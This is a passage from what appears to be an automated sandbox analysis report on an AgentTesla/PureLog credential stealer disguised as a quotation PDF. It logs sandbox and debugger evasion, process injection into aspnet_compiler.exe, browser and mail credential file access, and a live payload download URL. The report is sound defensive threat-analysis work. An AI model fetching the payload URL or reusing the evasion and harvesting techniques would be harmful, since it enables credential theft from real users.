                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97390Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97281Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97172Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97047Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96937Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96828Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96718Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96609Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96500Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96390Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96279Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96149Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96031Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95922Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95812Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95703Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95593Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95483Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95375Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95265Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95156Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95047Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 94937Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 94828Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 94718Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 94609Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 595125Jump to behavior
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware\V'q`
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1916600859.0000000001234000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q 1:en-CH:Microsoft|VMWare|Virtual
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q0VMware|VIRTUAL|A M I|Xen
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xent-
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q0Microsoft|VMWare|Virtual
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware\V'q
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q 1:en-CH:VMware|VIRTUAL|A M I|Xen
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual@\
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareLR
                    Source: aspnet_compiler.exe, 00000006.00000002.2681887191.0000000001145000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000031DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: explorer;SbieDll.dll<select * from Win32_BIOS8Unexpected WMI query failure=version>SerialNumber@VMware|VIRTUAL|A M I|XenAselect * from Win32_ComputerSystemBmanufacturerCmodelDMicrosoft|VMWare|VirtualEjohnFannaGxxxxxxxx
                    Source: aspnet_compiler.exe, 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareLR
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWareLR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB89F0 CheckRemoteDebuggerPresent,0_2_02DB89F0
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C91008Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeQueries volume information: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5584, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.7b20000.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4cf9640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.7b20000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4ad1618.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4cf9640.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4ad1618.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1935701482.0000000007B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1919160150.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2683739560.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5584, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5584, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.7b20000.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4cf9640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.7b20000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4ad1618.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4cf9640.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4ad1618.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1935701482.0000000007B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1919160150.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		211
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		531
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		261
                    Virtualization/Sandbox Evasion                    		Security Account Manager261
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync34
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467095 Sample: QUOTATION_JULQTRA071244#U00... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 18 ip-api.com 2->18 20 s21.filetransfer.io 2->20 22 filetransfer.io 2->22 28 Found malware configuration 2->28 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 11 other signatures 2->34 7 QUOTATION_JULQTRA071244#U00faPDF.scr.exe 15 3 2->7         started        signatures3 process4 dnsIp5 24 filetransfer.io 188.114.96.3, 443, 49705, 49706 CLOUDFLARENETUS European Union 7->24 16 QUOTATION_JULQTRA0...00faPDF.scr.exe.log, ASCII 7->16 dropped 36 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->36 38 Writes to foreign memory regions 7->38 40 Injects a PE file into a foreign processes 7->40 42 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 7->42 12 aspnet_compiler.exe 14 2 7->12         started        file6 signatures7 process8 dnsIp9 26 ip-api.com 208.95.112.1, 49713, 80 TUT-ASUS United States 12->26 44 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->44 46 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 2 other signatures 12->50 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    QUOTATION_JULQTRA071244#U00faPDF.scr.exe53%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    QUOTATION_JULQTRA071244#U00faPDF.scr.exe100%AviraHEUR/AGEN.1362232
                    QUOTATION_JULQTRA071244#U00faPDF.scr.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    https://s21.filetransfer.io0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                    http://filetransfer.iod0%Avira URL Cloudsafe
                    http://filetransfer.io/data-package/btd2ptah/download0C0%Avira URL Cloudsafe
                    http://filetransfer.io/data-package/btd2ptah/download0%Avira URL Cloudsafe
                    http://filetransfer.io0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                    https://filetransfer.ioli0%Avira URL Cloudsafe
                    https://filetransfer.io/data-package/btd2ptah/download0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s21.filetransfer.io
                    		188.114.96.3
                    		truefalse
                      		unknown
                      filetransfer.io
                      		188.114.96.3
                      		truefalse
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://filetransfer.io/data-package/btd2ptah/downloadfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://filetransfer.io/data-package/btd2ptah/downloadfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/mgravell/protobuf-netiQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stackoverflow.com/q/14436606/23354QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netJQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://filetransfer.io/data-package/btd2ptah/download0CQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://filetransfer.ioliQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stackoverflow.com/q/11564914/23354;QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
